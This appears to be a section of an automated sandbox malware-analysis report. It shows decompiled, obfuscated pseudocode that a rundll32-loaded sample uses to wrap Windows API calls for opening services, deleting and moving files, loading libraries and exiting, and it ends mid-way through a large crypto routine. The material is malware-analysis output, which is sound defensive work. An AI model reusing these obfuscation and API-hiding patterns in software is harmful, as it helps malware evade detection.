                                                                                                                      • Associated: 0000000C.00000002.510033009.0000000000730000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.510057605.0000000000755000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_730000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1279760036-0
                                                                                                                      • Opcode ID: 0f32b3375919fc0ccfdf2406b6b0c1b31f8184e837ed22a30a99afc3922f126c
                                                                                                                      • Instruction ID: 4b4f06309974cb2ce7a86f9189899a174e8e902f2dee0ec4516971096a761ec6
                                                                                                                      • Opcode Fuzzy Hash: 0f32b3375919fc0ccfdf2406b6b0c1b31f8184e837ed22a30a99afc3922f126c
                                                                                                                      • Instruction Fuzzy Hash: 8E11E2B2C0120DFBDF05DF94DA4A8EEBBB4EB14304F14C099E9116A252D7715B24AF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00732E96 Relevance: 1.5, APIs: 1, Instructions: 42serviceCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 67%
                                                                                                                      			E00732E96(void* __ecx, void* __edx, intOrPtr _a4, int _a8, intOrPtr _a12, short* _a16, void* _a20) {
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				void* _t35;
				void* _t42;

				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0073CF25(_t35);
				_v16 = 0xae7ad3;
				_v16 = _v16 >> 6;
				_v16 = _v16 >> 9;
				_v16 = _v16 ^ 0x000b5401;
				_v12 = 0xf75da6;
				_v12 = _v12 >> 7;
				_v12 = _v12 + 0xa35c;
				_v12 = _v12 ^ 0x00021a7e;
				_v8 = 0xb7fdd7;
				_v8 = _v8 * 0x34;
				_v8 = _v8 >> 7;
				_v8 = _v8 | 0x8cd68937;
				_v8 = _v8 ^ 0x8cd3b3e5;
				E00732D9F(0x53eee54a, 0xc3, __ecx, 0x1b74c9e2);
				_t42 = OpenServiceW(_a20, _a16, _a8); // executed
				return _t42;
			}








                                                                                                                      0x00732e9c
                                                                                                                      0x00732e9f
                                                                                                                      0x00732ea2
                                                                                                                      0x00732ea5
                                                                                                                      0x00732ea8
                                                                                                                      0x00732eac
                                                                                                                      0x00732ead
                                                                                                                      0x00732eb2
                                                                                                                      0x00732ebc
                                                                                                                      0x00732ec0
                                                                                                                      0x00732ec4
                                                                                                                      0x00732ecb
                                                                                                                      0x00732ed2
                                                                                                                      0x00732ed6
                                                                                                                      0x00732edd
                                                                                                                      0x00732ee4
                                                                                                                      0x00732eff
                                                                                                                      0x00732f02
                                                                                                                      0x00732f06
                                                                                                                      0x00732f0d
                                                                                                                      0x00732f1d
                                                                                                                      0x00732f2e
                                                                                                                      0x00732f33

                                                                                                                      APIs
                                                                                                                      • OpenServiceW.ADVAPI32(?,?,000B5401), ref: 00732F2E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510039469.0000000000731000.00000020.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.510033009.0000000000730000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.510057605.0000000000755000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_730000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: OpenService
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3098006287-0
                                                                                                                      • Opcode ID: 1a010bb4209eebcabefe83886664eafcedc3f71cda4b3a4488a61dc91c7b4f8b
                                                                                                                      • Instruction ID: 3a9d8a26dd6effd26c25f7331c554f2596361dd93956f22035b91cce03816042
                                                                                                                      • Opcode Fuzzy Hash: 1a010bb4209eebcabefe83886664eafcedc3f71cda4b3a4488a61dc91c7b4f8b
                                                                                                                      • Instruction Fuzzy Hash: C311CE72D0120CFBCF05EFE4D94A89DBBB1EB14308F20C098F915A6261E3769B64AF41
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0073BAB0 Relevance: 1.5, APIs: 1, Instructions: 40fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E0073BAB0(WCHAR* __ecx, void* __edx, intOrPtr _a4) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				void* _t30;
				int _t37;
				WCHAR* _t40;

				_push(_a4);
				_t40 = __ecx;
				_push(__ecx);
				E0073CF25(_t30);
				_v12 = 0xf8a4b;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0xa9327f6f;
				_v12 = _v12 ^ 0x26166746;
				_v12 = _v12 ^ 0x8f266abd;
				_v16 = 0xc512b4;
				_v16 = _v16 ^ 0xa05564f8;
				_v16 = _v16 | 0x9f0a4514;
				_v16 = _v16 ^ 0xbf9c633f;
				_v8 = 0x850486;
				_v8 = _v8 * 0x26;
				_v8 = _v8 + 0xffff9e70;
				_v8 = _v8 >> 0xf;
				_v8 = _v8 ^ 0x00077990;
				E00732D9F(0x7bb5ca56, 0xa2, __ecx, 0xa62ab78c);
				_t37 = DeleteFileW(_t40); // executed
				return _t37;
			}









                                                                                                                      0x0073bab7
                                                                                                                      0x0073baba
                                                                                                                      0x0073babd
                                                                                                                      0x0073babe
                                                                                                                      0x0073bac3
                                                                                                                      0x0073bacd
                                                                                                                      0x0073bad1
                                                                                                                      0x0073bad8
                                                                                                                      0x0073badf
                                                                                                                      0x0073bae6
                                                                                                                      0x0073baed
                                                                                                                      0x0073baf4
                                                                                                                      0x0073bafb
                                                                                                                      0x0073bb02
                                                                                                                      0x0073bb1d
                                                                                                                      0x0073bb20
                                                                                                                      0x0073bb27
                                                                                                                      0x0073bb2b
                                                                                                                      0x0073bb3b
                                                                                                                      0x0073bb44
                                                                                                                      0x0073bb4a

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510039469.0000000000731000.00000020.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.510033009.0000000000730000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.510057605.0000000000755000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_730000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: DeleteFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4033686569-0
                                                                                                                      • Opcode ID: 142492e115de819e337085e0760341fc4d7c13ea390934f1e7f80fc7c158108e
                                                                                                                      • Instruction ID: 32c04e8ec8568446332a28cf9ad2db42e4a84b97c734671eec75860fd3eb18f1
                                                                                                                      • Opcode Fuzzy Hash: 142492e115de819e337085e0760341fc4d7c13ea390934f1e7f80fc7c158108e
                                                                                                                      • Instruction Fuzzy Hash: 1101F375D01209FBDB54EFA5C98A4DEBFB4EF00300F208188E825AA211D7B41B459F95
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 007507D7 Relevance: 1.5, APIs: 1, Instructions: 40libraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 86%
                                                                                                                      			E007507D7(void* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t30;
				struct HINSTANCE__* _t39;
				signed int _t41;

				_push(_a8);
				_push(_a4);
				E0073CF25(_t30);
				_v12 = 0x89457d;
				_v12 = _v12 ^ 0x6b886c65;
				_v12 = _v12 | 0xf6315bef;
				_v12 = _v12 ^ 0xff319cd3;
				_v8 = 0xe31a0f;
				_t41 = 0xa;
				_v8 = _v8 * 0x1b;
				_v8 = _v8 << 5;
				_v8 = _v8 ^ 0xfe799add;
				_v16 = 0x93f3d7;
				_v16 = _v16 / _t41;
				_v16 = _v16 ^ 0x00076e75;
				E00732D9F(0xe1be5824, 0x1e6, _t41, 0xa62ab78c);
				_t39 = LoadLibraryW(_a4); // executed
				return _t39;
			}









                                                                                                                      0x007507dd
                                                                                                                      0x007507e0
                                                                                                                      0x007507e5
                                                                                                                      0x007507ea
                                                                                                                      0x007507f4
                                                                                                                      0x007507fd
                                                                                                                      0x00750804
                                                                                                                      0x0075080b
                                                                                                                      0x00750818
                                                                                                                      0x0075081f
                                                                                                                      0x00750822
                                                                                                                      0x00750826
                                                                                                                      0x0075082d
                                                                                                                      0x0075083e
                                                                                                                      0x00750841
                                                                                                                      0x00750856
                                                                                                                      0x00750861
                                                                                                                      0x00750866

                                                                                                                      APIs
                                                                                                                      • LoadLibraryW.KERNEL32(FF319CD3), ref: 00750861
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510039469.0000000000731000.00000020.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.510033009.0000000000730000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.510057605.0000000000755000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_730000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: LibraryLoad
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1029625771-0
                                                                                                                      • Opcode ID: b5a7ff1cf00df94c7e0cce40bb031e72467efb4d89ba6605bf6ea92949dc313d
                                                                                                                      • Instruction ID: 4dbb32a5e5abfa6048241efa9cdd55d356b747cbff32fb7ae036edaf8d32f2d7
                                                                                                                      • Opcode Fuzzy Hash: b5a7ff1cf00df94c7e0cce40bb031e72467efb4d89ba6605bf6ea92949dc313d
                                                                                                                      • Instruction Fuzzy Hash: 0F012275D0520CFFDB08EFE4C94A99EBFB1EB40304F20C098E915AB261E7B55B559B40
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0074E2C5 Relevance: 1.5, APIs: 1, Instructions: 37COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 81%
                                                                                                                      			E0074E2C5(void* __ecx, void* __edx, intOrPtr _a4, struct _SHFILEOPSTRUCTW* _a8) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				void* _t30;
				int _t37;

				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0073CF25(_t30);
				_v16 = 0x8c64b0;
				_v16 = _v16 + 0x962b;
				_v16 = _v16 >> 8;
				_v16 = _v16 ^ 0x000da62a;
				_v12 = 0xb02c29;
				_v12 = _v12 * 0x73;
				_v12 = _v12 + 0xffff997c;
				_v12 = _v12 ^ 0x4f272bd9;
				_v8 = 0x94952e;
				_v8 = _v8 + 0xa237;
				_v8 = _v8 ^ 0xcd764018;
				_v8 = _v8 + 0x8874;
				_v8 = _v8 ^ 0xcdeaa0fe;
				E00732D9F(0x2326b427, 0x2d, __ecx, 0xe4d0349b);
				_t37 = SHFileOperationW(_a8); // executed
				return _t37;
			}








                                                                                                                      0x0074e2cb
                                                                                                                      0x0074e2ce
                                                                                                                      0x0074e2d2
                                                                                                                      0x0074e2d3
                                                                                                                      0x0074e2d8
                                                                                                                      0x0074e2e2
                                                                                                                      0x0074e2e9
                                                                                                                      0x0074e2ed
                                                                                                                      0x0074e2f4
                                                                                                                      0x0074e30c
                                                                                                                      0x0074e30f
                                                                                                                      0x0074e316
                                                                                                                      0x0074e31d
                                                                                                                      0x0074e324
                                                                                                                      0x0074e32b
                                                                                                                      0x0074e332
                                                                                                                      0x0074e339
                                                                                                                      0x0074e349
                                                                                                                      0x0074e354
                                                                                                                      0x0074e359

                                                                                                                      APIs
                                                                                                                      • SHFileOperationW.SHELL32(000DA62A), ref: 0074E354
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510039469.0000000000731000.00000020.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.510033009.0000000000730000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.510057605.0000000000755000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_730000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FileOperation
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3080627654-0
                                                                                                                      • Opcode ID: df6e4e8d08ba67a79e6cc9105b91064a7161cfa041adeded471142a79e914314
                                                                                                                      • Instruction ID: 1dab9ef9940545002b200408029e0556932f629db03f19fc1a8639ff82be1bf8
                                                                                                                      • Opcode Fuzzy Hash: df6e4e8d08ba67a79e6cc9105b91064a7161cfa041adeded471142a79e914314
                                                                                                                      • Instruction Fuzzy Hash: AB0102B1D00308FBDB51DFA8D84A89DBBB0EB00314F20C188A8146A252E7B98B589F01
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00743CBB Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E00743CBB() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _t37;

				_v20 = _v20 & 0x00000000;
				_v24 = 0x868838;
				_v16 = 0xb6c7ac;
				_t37 = 0x79;
				_v16 = _v16 * 0x7d;
				_v16 = _v16 ^ 0x593c5b8b;
				_v8 = 0x23929;
				_v8 = _v8 | 0xd856564b;
				_v8 = _v8 << 0xd;
				_v8 = _v8 >> 1;
				_v8 = _v8 ^ 0x67f2afdd;
				_v12 = 0x42ac5b;
				_v12 = _v12 / _t37;
				_v12 = _v12 ^ 0x0009f0c4;
				E00732D9F(0x8cff02b7, 0x12e, _t37, 0xa62ab78c);
				ExitProcess(0);
			}









                                                                                                                      0x00743cc1
                                                                                                                      0x00743cc7
                                                                                                                      0x00743cce
                                                                                                                      0x00743cdb
                                                                                                                      0x00743ce2
                                                                                                                      0x00743ce5
                                                                                                                      0x00743cec
                                                                                                                      0x00743cf3
                                                                                                                      0x00743cfa
                                                                                                                      0x00743cfe
                                                                                                                      0x00743d01
                                                                                                                      0x00743d08
                                                                                                                      0x00743d19
                                                                                                                      0x00743d1c
                                                                                                                      0x00743d31
                                                                                                                      0x00743d3b

                                                                                                                      APIs
                                                                                                                      • ExitProcess.KERNEL32(00000000), ref: 00743D3B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510039469.0000000000731000.00000020.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.510033009.0000000000730000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.510057605.0000000000755000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_730000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ExitProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 621844428-0
                                                                                                                      • Opcode ID: dd524d5e584c69c4875a986859085bb36bd1bb49e57c992e29c8257b5ff704c2
                                                                                                                      • Instruction ID: b177262af6eae7d6f13451d27294d3e2ceeb6c6a48a0562be640ce07ef664204
                                                                                                                      • Opcode Fuzzy Hash: dd524d5e584c69c4875a986859085bb36bd1bb49e57c992e29c8257b5ff704c2
                                                                                                                      • Instruction Fuzzy Hash: C20144B6D0020CFFDB04DFE4C94AA9DBBB0EB00300F608089E925AB290D7B81B50DF41
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0074FC96 Relevance: 1.3, APIs: 1, Instructions: 41stringCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 80%
                                                                                                                      			E0074FC96(void* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				void* _t32;
				int _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0073CF25(_t32);
				_v8 = 0x178fa1;
				_v8 = _v8 | 0x2f4d5c19;
				_v8 = _v8 + 0xda24;
				_t42 = 0x35;
				_v8 = _v8 / _t42;
				_v8 = _v8 ^ 0x00e923af;
				_v16 = 0xca5f26;
				_v16 = _v16 << 0xe;
				_v16 = _v16 ^ 0x97c71065;
				_v12 = 0xeb54f5;
				_v12 = _v12 >> 4;
				_v12 = _v12 ^ 0x0000b8cd;
				E00732D9F(0xb8f00729, 0x289, _t42, 0xa62ab78c);
				_t40 = lstrcmpiW(_a12, _a4); // executed
				return _t40;
			}









                                                                                                                      0x0074fc9c
                                                                                                                      0x0074fc9f
                                                                                                                      0x0074fca2
                                                                                                                      0x0074fca7
                                                                                                                      0x0074fcac
                                                                                                                      0x0074fcb6
                                                                                                                      0x0074fcbf
                                                                                                                      0x0074fccb
                                                                                                                      0x0074fcd3
                                                                                                                      0x0074fcd6
                                                                                                                      0x0074fcdd
                                                                                                                      0x0074fce4
                                                                                                                      0x0074fce8
                                                                                                                      0x0074fcef
                                                                                                                      0x0074fcf6
                                                                                                                      0x0074fcfa
                                                                                                                      0x0074fd15
                                                                                                                      0x0074fd23
                                                                                                                      0x0074fd28

                                                                                                                      APIs
                                                                                                                      • lstrcmpiW.KERNEL32(?,0000B8CD), ref: 0074FD23
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510039469.0000000000731000.00000020.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.510033009.0000000000730000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000C.00000002.510057605.0000000000755000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_730000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrcmpi
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1586166983-0
                                                                                                                      • Opcode ID: bcaea3a6b408ae5b0ea271ecf45cf18554c4d7f2312cff19f50c51f1dc53bf3d
                                                                                                                      • Instruction ID: 319607c0a758ea0da2930f7ee42a9c12e1fd8c6f88fd1319bfb9df0d0d52b06a
                                                                                                                      • Opcode Fuzzy Hash: bcaea3a6b408ae5b0ea271ecf45cf18554c4d7f2312cff19f50c51f1dc53bf3d
                                                                                                                      • Instruction Fuzzy Hash: 9D01C276D00208FFDF05EFE4C94A89EBBB5AB44304F108098E9156A251DBB69B649B51
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Non-executed Functions

                                                                                                                      Function 0082CCD7 Relevance: 15.5, Strings: 12, Instructions: 455COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E0082CCD7() {
				char _v520;
				char _v1040;
				char _v1560;
				char _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				unsigned int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				void* _t526;
				signed int _t531;
				void* _t540;
				signed int _t550;
				signed int _t552;
				signed int _t553;
				signed int _t554;
				signed int _t555;
				signed int _t556;
				signed int _t557;
				signed int _t558;
				signed int _t559;
				signed int _t560;
				signed int _t561;
				signed int _t562;
				signed int _t563;
				signed int _t564;
				signed int _t565;
				signed int _t566;
				signed int _t567;
				void* _t568;
				void* _t625;
				signed int _t627;
				signed int* _t631;

				_t631 =  &_v1760;
				_v1616 = 0xeae527;
				_v1568 = 0;
				_t553 = 0x26;
				_v1616 = _v1616 / _t553;
				_v1616 = _v1616 ^ 0x00062e5a;
				_t625 = 0x971d92c;
				_v1596 = 0x6602e1;
				_t554 = 0x25;
				_v1596 = _v1596 / _t554;
				_v1596 = _v1596 ^ 0x8002c1cf;
				_v1644 = 0xf63434;
				_t555 = 0x47;
				_v1644 = _v1644 / _t555;
				_v1644 = _v1644 + 0xf19c;
				_v1644 = _v1644 ^ 0x00046956;
				_v1716 = 0x50524a;
				_t32 =  &_v1716; // 0x50524a
				_t556 = 0x5f;
				_v1716 =  *_t32 / _t556;
				_v1716 = _v1716 + 0xeb9a;
				_v1716 = _v1716 >> 0x10;
				_v1696 = 0xd12665;
				_v1696 = _v1696 + 0xba99;
				_v1696 = _v1696 >> 2;
				_v1696 = _v1696 ^ 0x003ae3d7;
				_v1572 = 0xb7077f;
				_v1572 = _v1572 >> 0xb;
				_v1572 = _v1572 ^ 0x00005559;
				_v1732 = 0xacadbb;
				_v1732 = _v1732 * 0x18;
				_v1732 = _v1732 + 0xffff3f00;
				_v1732 = _v1732 >> 0xb;
				_v1732 = _v1732 ^ 0x0000fc07;
				_v1628 = 0x1e838c;
				_v1628 = _v1628 + 0xffff51c5;
				_v1628 = _v1628 * 0x68;
				_v1628 = _v1628 ^ 0x0c18a6b3;
				_v1712 = 0x7a729f;
				_v1712 = _v1712 | 0x553aa77e;
				_v1712 = _v1712 ^ 0x421b02cb;
				_v1712 = _v1712 * 0x57;
				_v1712 = _v1712 ^ 0xf24da14c;
				_v1620 = 0x85e70f;
				_v1620 = _v1620 >> 0xb;
				_v1620 = _v1620 ^ 0x000e59ba;
				_v1752 = 0xad6578;
				_v1752 = _v1752 * 0x5a;
				_v1752 = _v1752 << 0xc;
				_v1752 = _v1752 << 0x10;
				_v1752 = _v1752 ^ 0x00023595;
				_v1728 = 0x3989b2;
				_v1728 = _v1728 * 0x27;
				_v1728 = _v1728 * 0x4d;
				_v1728 = _v1728 << 4;
				_v1728 = _v1728 ^ 0x2f238c3a;
				_v1744 = 0x50e625;
				_v1744 = _v1744 ^ 0x2e9ac150;
				_v1744 = _v1744 >> 2;
				_v1744 = _v1744 >> 5;
				_v1744 = _v1744 ^ 0x00596b64;
				_v1684 = 0x3fc833;
				_t557 = 0x76;
				_v1684 = _v1684 / _t557;
				_v1684 = _v1684 ^ 0xe050a76e;
				_v1684 = _v1684 ^ 0xe05ba95d;
				_v1576 = 0x904481;
				_v1576 = _v1576 | 0xbb34e4d7;
				_v1576 = _v1576 ^ 0xbbb7ee3e;
				_v1612 = 0xe49eb3;
				_v1612 = _v1612 + 0xfa7c;
				_v1612 = _v1612 ^ 0x00e777f0;
				_v1624 = 0x2dc9df;
				_v1624 = _v1624 ^ 0xfde67a02;
				_v1624 = _v1624 >> 4;
				_v1624 = _v1624 ^ 0x0fd7f95a;
				_v1688 = 0xb27c91;
				_v1688 = _v1688 + 0xcc48;
				_v1688 = _v1688 + 0xffff6aea;
				_v1688 = _v1688 ^ 0x00b739bb;
				_v1676 = 0x9962ec;
				_v1676 = _v1676 + 0xd2bc;
				_t627 = 0x59;
				_t558 = 0x22;
				_v1676 = _v1676 * 0x31;
				_v1676 = _v1676 ^ 0x1d838c0c;
				_v1720 = 0x20e7d3;
				_v1720 = _v1720 / _t627;
				_v1720 = _v1720 / _t558;
				_v1720 = _v1720 / _t627;
				_v1720 = _v1720 ^ 0x0002b2fc;
				_v1652 = 0xf809ca;
				_v1652 = _v1652 | 0xf7ee8eed;
				_v1652 = _v1652 << 1;
				_v1652 = _v1652 ^ 0xeff238d7;
				_v1580 = 0x7cb108;
				_v1580 = _v1580 + 0x41b4;
				_v1580 = _v1580 ^ 0x0076b4d3;
				_v1668 = 0xb3209d;
				_t559 = 0x53;
				_v1668 = _v1668 / _t559;
				_v1668 = _v1668 << 0xd;
				_v1668 = _v1668 ^ 0x450753ed;
				_v1604 = 0x53775b;
				_v1604 = _v1604 | 0x32a41867;
				_v1604 = _v1604 ^ 0x32fba052;
				_v1636 = 0xbc3265;
				_v1636 = _v1636 + 0xffff23eb;
				_v1636 = _v1636 ^ 0xe68a0726;
				_v1636 = _v1636 ^ 0xe63f3d4e;
				_v1756 = 0xe1916f;
				_v1756 = _v1756 + 0x6ec8;
				_v1756 = _v1756 | 0xf937d932;
				_v1756 = _v1756 + 0xfffffd3f;
				_v1756 = _v1756 ^ 0xf9f085ba;
				_v1588 = 0x69c4ca;
				_v1588 = _v1588 + 0xe8a1;
				_v1588 = _v1588 ^ 0x00630ca4;
				_v1584 = 0x6b201e;
				_v1584 = _v1584 | 0x74aee044;
				_v1584 = _v1584 ^ 0x74eba3bf;
				_v1760 = 0xf230ab;
				_v1760 = _v1760 >> 9;
				_v1760 = _v1760 >> 0xa;
				_v1760 = _v1760 >> 4;
				_v1760 = _v1760 ^ 0x00016a96;
				_v1704 = 0x98b305;
				_v1704 = _v1704 + 0x69fd;
				_v1704 = _v1704 ^ 0x979b8a6a;
				_v1704 = _v1704 + 0xffff998b;
				_v1704 = _v1704 ^ 0x9709d1d7;
				_v1736 = 0xce8702;
				_v1736 = _v1736 >> 0xa;
				_v1736 = _v1736 + 0x7a8b;
				_v1736 = _v1736 << 1;
				_v1736 = _v1736 ^ 0x000e6a30;
				_v1740 = 0x4c6a4b;
				_v1740 = _v1740 << 0xb;
				_v1740 = _v1740 | 0x0577b2ac;
				_v1740 = _v1740 + 0xffff4db5;
				_v1740 = _v1740 ^ 0x6775c844;
				_v1748 = 0x8b8c8;
				_t560 = 0x14;
				_v1748 = _v1748 / _t560;
				_t561 = 0x67;
				_v1748 = _v1748 / _t561;
				_t562 = 7;
				_v1748 = _v1748 * 0x36;
				_v1748 = _v1748 ^ 0x000fee79;
				_v1660 = 0xc3e5ac;
				_v1660 = _v1660 + 0xffffa1ff;
				_t563 = 0x46;
				_v1660 = _v1660 / _t562;
				_v1660 = _v1660 ^ 0x001e32d9;
				_v1664 = 0x1a636c;
				_v1664 = _v1664 | 0xf6dbfbcf;
				_v1664 = _v1664 ^ 0xf6df054d;
				_v1724 = 0xea18bc;
				_v1724 = _v1724 / _t563;
				_v1724 = _v1724 | 0x2d596700;
				_v1724 = _v1724 >> 1;
				_v1724 = _v1724 ^ 0x16a5f059;
				_v1672 = 0x567483;
				_v1672 = _v1672 >> 7;
				_v1672 = _v1672 + 0xffffe0a0;
				_v1672 = _v1672 ^ 0x000eacf4;
				_v1680 = 0x757070;
				_v1680 = _v1680 >> 0xd;
				_v1680 = _v1680 ^ 0xeacc73ee;
				_v1680 = _v1680 ^ 0xeac5b183;
				_v1648 = 0x45ab81;
				_v1648 = _v1648 >> 6;
				_v1648 = _v1648 + 0xffff50ab;
				_v1648 = _v1648 ^ 0x000d5f86;
				_v1708 = 0x462580;
				_t564 = 0xb;
				_t550 = _v1568;
				_v1708 = _v1708 / _t564;
				_t565 = 0x75;
				_v1708 = _v1708 / _t565;
				_t566 = 0x37;
				_v1708 = _v1708 * 0x50;
				_v1708 = _v1708 ^ 0x00078e43;
				_v1592 = 0x6b02b0;
				_v1592 = _v1592 + 0xffff70eb;
				_v1592 = _v1592 ^ 0x006caa59;
				_v1600 = 0x2f56d1;
				_v1600 = _v1600 ^ 0x1dd1a998;
				_v1600 = _v1600 ^ 0x1df0badb;
				_v1656 = 0xa683af;
				_v1656 = _v1656 / _t566;
				_v1656 = _v1656 << 1;
				_v1656 = _v1656 ^ 0x0003d06f;
				_v1608 = 0x6ef6d9;
				_v1608 = _v1608 + 0xd0f0;
				_v1608 = _v1608 ^ 0x006391fa;
				_v1700 = 0x90b08b;
				_v1700 = _v1700 + 0x4c46;
				_v1700 = _v1700 | 0x5cc03ba9;
				_t567 = 0x12;
				_v1700 = _v1700 / _t567;
				_v1700 = _v1700 ^ 0x052b7d82;
				_v1692 = 0x3d9f33;
				_v1692 = _v1692 + 0xffff6a07;
				_v1692 = _v1692 ^ 0xa1c8547f;
				_v1692 = _v1692 ^ 0xa1f3c56b;
				_v1632 = 0x96979b;
				_v1632 = _v1632 / _t627;
				_v1632 = _v1632 >> 0xa;
				_v1632 = _v1632 ^ 0x0009a5bf;
				_v1640 = 0x6f31a2;
				_v1640 = _v1640 ^ 0x3a2ad5a2;
				_v1640 = _v1640 ^ 0xeb2d3a23;
				_v1640 = _v1640 ^ 0xd16332d1;
				while(1) {
					L1:
					_t568 = 0x5c;
					while(1) {
						L2:
						_t526 = 0xdd30c3;
						do {
							L3:
							if(_t625 == _t526) {
